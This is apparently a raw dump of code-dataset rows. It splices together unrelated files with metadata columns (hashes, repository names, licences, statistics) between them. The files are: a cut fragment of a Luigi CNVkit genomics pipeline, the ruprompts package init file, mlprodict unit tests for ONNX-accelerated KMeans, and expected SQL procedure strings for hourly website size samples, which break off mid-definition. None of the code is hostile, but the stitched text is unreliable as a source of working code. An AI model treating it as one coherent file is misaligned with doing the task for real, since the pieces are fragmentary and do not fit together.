+ [luigi.LocalTarget(os.path.join(self.project_dir, 'output', 'cnvkit', 'variants', '%s_T_recalibrated.antitargetcoverage.cnn' % case_name)) for case_name in self.case_dict] \
+ [luigi.LocalTarget(os.path.join(self.project_dir, 'output', 'cnvkit', 'variants', '%s_N_recalibrated.targetcoverage.cnn' % case_name)) for case_name in self.case_dict if self.case_dict[case_name]['N'] != ''] \
+ [luigi.LocalTarget(os.path.join(self.project_dir, 'output', 'cnvkit', 'variants', '%s_N_recalibrated.antitargetcoverage.cnn' % case_name)) for case_name in self.case_dict if self.case_dict[case_name]['N'] != '']
def run(self):
for output in self.output():
pipeline_utils.confirm_path(output.path)
# if self.matched_n:
# cmd = ['./packages/VarDictJava/build/install/VarDict/bin/VarDict', '-G', self.cfg['fasta_file'], '-f', '0.01', '-N', self.case + '_T', '-b', '"%s|%s"' % (self.input()[0][0].path, self.input()[1][0].path), '-z', '-F', '-c', '1', '-S', '2', '-E', '3', '-g', '4', self.cfg['library_bed'], '|', './packages/VarDictJava/VarDict/testsomatic.R', '|', './packages/VarDictJava/VarDict/var2vcf_paired.pl', '-N', '"%s|%s"' % (self.case + '_T', self.case + '_N'), '-f', '0.01', '>%s' % os.path.join(self.vcf_path, 'vardict')]
# else:
cmd = ['python3', './packages/cnvkit/cnvkit.py', 'batch', os.path.join(self.project_dir, 'output', '*', 'alignment', '*T*recalibrated.bam'), '--normal', os.path.join(self.project_dir, 'output', '*', 'alignment', '*N*recalibrated.bam'), '--targets', self.cfg['library_bed'], '--fasta', self.cfg['fasta_file'], '--output-reference', self.output()[0].path, '--output-dir', os.path.join(self.project_dir, 'output', 'cnvkit', 'variants'), '--diagram', '--scatter', '--rlibpath', './packages/R', '--annotate', './packages/cnvkit/data/refFlat_b37.txt', '--drop-low-coverage', '-p', self.max_threads]
pipeline_utils.command_call(cmd, self.output(), threads_needed=self.max_threads)
| 48.33844
| 594
| 0.702711
| 5,096
| 34,707
| 4.589286
| 0.057692
| 0.081413
| 0.038312
| 0.025741
| 0.904862
| 0.897037
| 0.891949
| 0.889383
| 0.873348
| 0.862359
| 0
| 0.0088
| 0.106175
| 34,707
| 717
| 595
| 48.405858
| 0.745084
| 0.164232
| 0
| 0.718468
| 0
| 0
| 0.149946
| 0.05305
| 0
| 0
| 0
| 0
| 0
| 1
| 0.135135
| false
| 0.006757
| 0.024775
| 0.072072
| 0.572072
| 0.002252
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
99f928d43051cdad79c8075f0cafc9ceccd47e51
| 352
|
py
|
Python
|
ruprompts/__init__.py
|
sberbank-ai/ru-prompts
|
4eeedae92cb5234c70adc787ace7cfceb76b0be0
|
[
"Apache-2.0"
] | 30
|
2021-12-17T07:05:10.000Z
|
2022-02-22T09:38:35.000Z
|
ruprompts/__init__.py
|
sberbank-ai/ru-prompts
|
4eeedae92cb5234c70adc787ace7cfceb76b0be0
|
[
"Apache-2.0"
] | null | null | null |
ruprompts/__init__.py
|
sberbank-ai/ru-prompts
|
4eeedae92cb5234c70adc787ace7cfceb76b0be0
|
[
"Apache-2.0"
] | 2
|
2022-01-04T01:36:48.000Z
|
2022-01-04T02:00:24.000Z
|
from ruprompts.pipelines import (
Text2TextGenerationWithPromptPipeline,
TextGenerationWithPromptPipeline,
)
from ruprompts.preprocessing import Text2TextPreprocessor
from ruprompts.prompt import MultiPrompt, Prompt
from ruprompts.prompt_format import PromptFormat
from ruprompts.prompt_provider import LSTMPromptProvider, TensorPromptProvider
| 39.111111
| 78
| 0.875
| 30
| 352
| 10.2
| 0.5
| 0.212418
| 0.186275
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00627
| 0.09375
| 352
| 8
| 79
| 44
| 0.952978
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.625
| 0
| 0.625
| 0
| 0
| 0
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
413937787fb2463aa5bca94811628297c341550c
| 7,760
|
py
|
Python
|
_unittests/ut_sklapi/test_onnx_speedup_cluster.py
|
sdpython/mlprodic
|
9367dacc91d35ec670c8a8a76708300a75bbc993
|
[
"MIT"
] | 32
|
2018-03-04T23:33:30.000Z
|
2022-03-10T19:15:06.000Z
|
_unittests/ut_sklapi/test_onnx_speedup_cluster.py
|
sdpython/mlprodic
|
9367dacc91d35ec670c8a8a76708300a75bbc993
|
[
"MIT"
] | 184
|
2017-11-30T14:10:35.000Z
|
2022-02-21T08:29:31.000Z
|
_unittests/ut_sklapi/test_onnx_speedup_cluster.py
|
sdpython/mlprodic
|
9367dacc91d35ec670c8a8a76708300a75bbc993
|
[
"MIT"
] | 9
|
2019-07-24T13:18:00.000Z
|
2022-03-07T04:08:07.000Z
|
"""
@brief test log(time=5s)
"""
from io import BytesIO
import pickle
import unittest
from logging import getLogger
import numpy
from numba import NumbaWarning
# import pandas
# from sklearn.pipeline import make_pipeline
from sklearn.exceptions import ConvergenceWarning
from sklearn.cluster import KMeans
from sklearn.datasets import load_iris
from pyquickhelper.pycode import ExtTestCase, ignore_warnings
from mlprodict.sklapi import OnnxSpeedupCluster
from mlprodict.tools import get_opset_number_from_onnx
from mlprodict.onnx_conv import to_onnx
from mlprodict.onnxrt import OnnxInference
class TestOnnxSpeedupCluster(ExtTestCase):
def setUp(self):
logger = getLogger('skl2onnx')
logger.disabled = True
def opset(self):
return get_opset_number_from_onnx()
@ignore_warnings(ConvergenceWarning)
def test_speedup_kmeans32(self):
data = load_iris()
X, y = data.data, data.target
spd = OnnxSpeedupCluster(
KMeans(n_clusters=3), target_opset=self.opset())
spd.fit(X, y)
spd.assert_almost_equal(X, decimal=4)
@ignore_warnings(ConvergenceWarning)
def test_speedup_kmeans32_onnxruntime(self):
data = load_iris()
X, y = data.data, data.target
spd = OnnxSpeedupCluster(
KMeans(n_clusters=3), target_opset=self.opset(),
runtime="onnxruntime1")
spd.fit(X, y)
spd.assert_almost_equal(X, decimal=4)
@ignore_warnings(ConvergenceWarning)
def test_speedup_kmeans32_numpy(self):
data = load_iris()
X, y = data.data, data.target
spd = OnnxSpeedupCluster(
KMeans(n_clusters=3), target_opset=self.opset(),
runtime="numpy")
spd.fit(X, y)
spd.assert_almost_equal(X, decimal=4)
@ignore_warnings((ConvergenceWarning, NumbaWarning))
def test_speedup_kmeans32_numba(self):
data = load_iris()
X, y = data.data, data.target
X = X.astype(numpy.float32)
spd = OnnxSpeedupCluster(
KMeans(n_clusters=3), target_opset=self.opset(),
runtime="numba", nopython=False)
spd.fit(X, y)
spd.assert_almost_equal(X, decimal=4)
self.assertIn("CPUDispatch", str(spd.onnxrt_.func))
@ignore_warnings(ConvergenceWarning)
def test_speedup_kmeans64(self):
data = load_iris()
X, y = data.data, data.target
spd = OnnxSpeedupCluster(
KMeans(n_clusters=3), target_opset=self.opset(),
enforce_float32=False)
spd.fit(X, y)
spd.assert_almost_equal(X)
@ignore_warnings(ConvergenceWarning)
def test_speedup_kmeans64_op_version(self):
data = load_iris()
X, y = data.data, data.target
spd = OnnxSpeedupCluster(
KMeans(n_clusters=3), target_opset=self.opset(),
enforce_float32=False)
spd.fit(X, y)
opset = spd.op_version
self.assertGreater(self.opset(), opset[''])
@ignore_warnings(ConvergenceWarning)
def test_speedup_kmeans64_pickle(self):
data = load_iris()
X, y = data.data, data.target
spd = OnnxSpeedupCluster(
KMeans(n_clusters=3), target_opset=self.opset(),
enforce_float32=False)
spd.fit(X, y)
st = BytesIO()
pickle.dump(spd, st)
st2 = BytesIO(st.getvalue())
spd2 = pickle.load(st2)
expected = spd.predict(X)
got = spd2.predict(X)
self.assertEqualArray(expected, got)
expected = spd.raw_predict(X)
got = spd2.raw_predict(X)
self.assertEqualArray(expected, got)
@ignore_warnings(ConvergenceWarning)
def test_speedup_kmeans64_numpy_pickle(self):
data = load_iris()
X, y = data.data, data.target
spd = OnnxSpeedupCluster(
KMeans(n_clusters=3), target_opset=self.opset(),
enforce_float32=False, runtime="numpy")
spd.fit(X, y)
st = BytesIO()
pickle.dump(spd, st)
st2 = BytesIO(st.getvalue())
spd2 = pickle.load(st2)
expected = spd.predict(X)
got = spd2.predict(X)
self.assertEqualArray(expected, got)
expected = spd.raw_predict(X)
got = spd2.raw_predict(X)
self.assertEqualArray(expected, got)
@ignore_warnings((ConvergenceWarning, NumbaWarning))
def test_speedup_kmeans64_numba_pickle(self):
data = load_iris()
X, y = data.data, data.target
spd = OnnxSpeedupCluster(
KMeans(n_clusters=3), target_opset=self.opset(),
enforce_float32=False, runtime="numba", nopython=False)
spd.fit(X, y)
st = BytesIO()
pickle.dump(spd, st)
st2 = BytesIO(st.getvalue())
spd2 = pickle.load(st2)
expected = spd.predict(X)
got = spd2.predict(X)
self.assertEqualArray(expected, got)
expected = spd.raw_predict(X)
got = spd2.raw_predict(X)
self.assertEqualArray(expected, got)
@ignore_warnings(ConvergenceWarning)
def test_speedup_kmeans64_onnx(self):
data = load_iris()
X, y = data.data, data.target
spd = OnnxSpeedupCluster(
KMeans(n_clusters=3), target_opset=self.opset(),
enforce_float32=False)
spd.fit(X, y)
expected_label = spd.predict(X)
expected_score = spd.transform(X)
onx = to_onnx(spd, X[:1])
oinf = OnnxInference(onx)
got = oinf.run({'X': X})
self.assertEqualArray(expected_score, got['scores'])
self.assertEqualArray(expected_label, got['label'])
@ignore_warnings(ConvergenceWarning)
def test_speedup_kmeans64_onnx_numpy(self):
data = load_iris()
X, y = data.data, data.target
spd = OnnxSpeedupCluster(
KMeans(n_clusters=3), target_opset=self.opset(),
enforce_float32=False, runtime='numpy')
spd.fit(X, y)
expected_label = spd.predict(X)
expected_score = spd.transform(X)
onx = to_onnx(spd, X[:1])
oinf = OnnxInference(onx)
got = oinf.run({'X': X})
self.assertEqualArray(expected_score, got['scores'])
self.assertEqualArray(expected_label, got['label'])
@ignore_warnings((ConvergenceWarning, NumbaWarning))
def test_speedup_kmeans64_onnx_numba(self):
data = load_iris()
X, y = data.data, data.target
spd = OnnxSpeedupCluster(
KMeans(n_clusters=3), target_opset=self.opset(),
enforce_float32=False, runtime='numba', nopython=False)
spd.fit(X, y)
# print(spd.numpy_code_)
expected_label = spd.predict(X)
expected_score = spd.transform(X)
onx = to_onnx(spd, X[:1])
oinf = OnnxInference(onx)
got = oinf.run({'X': X})
self.assertEqualArray(expected_score, got['scores'])
self.assertEqualArray(expected_label, got['label'])
@ignore_warnings((ConvergenceWarning, NumbaWarning))
def test_speedup_kmeans64_onnx_numba_python(self):
data = load_iris()
X, y = data.data, data.target
spd = OnnxSpeedupCluster(
KMeans(n_clusters=3), target_opset=self.opset(),
enforce_float32=False, runtime='numba', nopython=False)
spd.fit(X, y)
# print(spd.numpy_code_)
expected_label = spd.predict(X)
expected_score = spd.transform(X)
onx = to_onnx(spd, X[:1])
oinf = OnnxInference(onx)
got = oinf.run({'X': X})
self.assertEqualArray(expected_score, got['scores'])
self.assertEqualArray(expected_label, got['label'])
if __name__ == '__main__':
# TestOnnxSpeedupCluster().test_speedup_kmeans32()
unittest.main()
| 34.336283
| 67
| 0.635438
| 912
| 7,760
| 5.220395
| 0.120614
| 0.010922
| 0.082336
| 0.043688
| 0.829658
| 0.820416
| 0.819366
| 0.768536
| 0.752363
| 0.752363
| 0
| 0.015036
| 0.254381
| 7,760
| 225
| 68
| 34.488889
| 0.807812
| 0.023454
| 0
| 0.755208
| 0
| 0
| 0.016125
| 0
| 0
| 0
| 0
| 0
| 0.109375
| 1
| 0.078125
| false
| 0
| 0.072917
| 0.005208
| 0.161458
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
41428dcf6d1fb25a21a121c3fb4919bb9d19def5
| 46,614
|
py
|
Python
|
mysql_config/WebMonitoring/generators/website/tests/website_expected_size.py
|
raresraf/rafMetrics
|
21eb5e8210364bf70eee746d71c45f3e353dcb10
|
[
"MIT"
] | 15
|
2019-11-03T18:01:27.000Z
|
2021-05-05T20:54:57.000Z
|
mysql_config/WebMonitoring/generators/website/tests/website_expected_size.py
|
raresraf/rafMetrics
|
21eb5e8210364bf70eee746d71c45f3e353dcb10
|
[
"MIT"
] | 392
|
2019-11-09T21:28:01.000Z
|
2022-03-31T13:04:45.000Z
|
mysql_config/WebMonitoring/generators/website/tests/website_expected_size.py
|
raresraf/rafMetrics
|
21eb5e8210364bf70eee746d71c45f3e353dcb10
|
[
"MIT"
] | 1
|
2021-03-11T18:35:16.000Z
|
2021-03-11T18:35:16.000Z
|
EXPECTED_DAILY_WEBSITE_GENERATE_SAMPLES_QUERIES_SIZE = """delimiter //
DROP PROCEDURE IF EXISTS get_daily_samples_size_websites;
CREATE PROCEDURE get_daily_samples_size_websites (
IN id INT,
OUT entry0 FLOAT,
OUT entry1 FLOAT,
OUT entry2 FLOAT,
OUT entry3 FLOAT,
OUT entry4 FLOAT,
OUT entry5 FLOAT,
OUT entry6 FLOAT,
OUT entry7 FLOAT,
OUT entry8 FLOAT,
OUT entry9 FLOAT,
OUT entry10 FLOAT,
OUT entry11 FLOAT,
OUT entry12 FLOAT,
OUT entry13 FLOAT,
OUT entry14 FLOAT,
OUT entry15 FLOAT,
OUT entry16 FLOAT,
OUT entry17 FLOAT,
OUT entry18 FLOAT,
OUT entry19 FLOAT,
OUT entry20 FLOAT,
OUT entry21 FLOAT,
OUT entry22 FLOAT,
OUT entry23 FLOAT,
OUT start_hour FLOAT
)
BEGIN
select HOUR(now()) INTO start_hour;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 24 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 23 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry0 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 24 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 23 HOUR) AND Websiteid = id limit 1);
else SET entry0 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 23 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 22 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry1 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 23 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 22 HOUR) AND Websiteid = id limit 1);
else SET entry1 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 22 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 21 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry2 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 22 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 21 HOUR) AND Websiteid = id limit 1);
else SET entry2 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 21 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 20 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry3 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 21 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 20 HOUR) AND Websiteid = id limit 1);
else SET entry3 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 20 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 19 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry4 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 20 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 19 HOUR) AND Websiteid = id limit 1);
else SET entry4 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 19 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 18 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry5 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 19 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 18 HOUR) AND Websiteid = id limit 1);
else SET entry5 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 18 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 17 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry6 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 18 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 17 HOUR) AND Websiteid = id limit 1);
else SET entry6 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 17 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 16 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry7 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 17 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 16 HOUR) AND Websiteid = id limit 1);
else SET entry7 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 16 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 15 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry8 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 16 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 15 HOUR) AND Websiteid = id limit 1);
else SET entry8 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 15 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 14 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry9 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 15 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 14 HOUR) AND Websiteid = id limit 1);
else SET entry9 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 14 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 13 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry10 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 14 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 13 HOUR) AND Websiteid = id limit 1);
else SET entry10 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 13 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 12 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry11 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 13 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 12 HOUR) AND Websiteid = id limit 1);
else SET entry11 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 12 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 11 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry12 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 12 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 11 HOUR) AND Websiteid = id limit 1);
else SET entry12 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 11 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 10 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry13 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 11 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 10 HOUR) AND Websiteid = id limit 1);
else SET entry13 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 10 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 9 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry14 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 10 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 9 HOUR) AND Websiteid = id limit 1);
else SET entry14 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 9 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 8 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry15 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 9 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 8 HOUR) AND Websiteid = id limit 1);
else SET entry15 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 8 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 7 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry16 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 8 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 7 HOUR) AND Websiteid = id limit 1);
else SET entry16 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 7 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 6 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry17 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 7 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 6 HOUR) AND Websiteid = id limit 1);
else SET entry17 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 6 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 5 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry18 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 6 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 5 HOUR) AND Websiteid = id limit 1);
else SET entry18 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 5 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 4 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry19 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 5 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 4 HOUR) AND Websiteid = id limit 1);
else SET entry19 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 4 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 3 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry20 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 4 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 3 HOUR) AND Websiteid = id limit 1);
else SET entry20 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 3 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 2 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry21 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 3 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 2 HOUR) AND Websiteid = id limit 1);
else SET entry21 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 2 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 1 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry22 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 2 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 1 HOUR) AND Websiteid = id limit 1);
else SET entry22 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 1 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 0 HOUR) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry23 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 1 HOUR) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 0 HOUR) AND Websiteid = id limit 1);
else SET entry23 := 0;
end if;
END//
delimiter ;
"""
EXPECTED_WEEKLY_WEBSITE_GENERATE_SAMPLES_QUERIES_SIZE = """delimiter //
DROP PROCEDURE IF EXISTS get_weekly_samples_size_websites;
CREATE PROCEDURE get_weekly_samples_size_websites (
IN id INT,
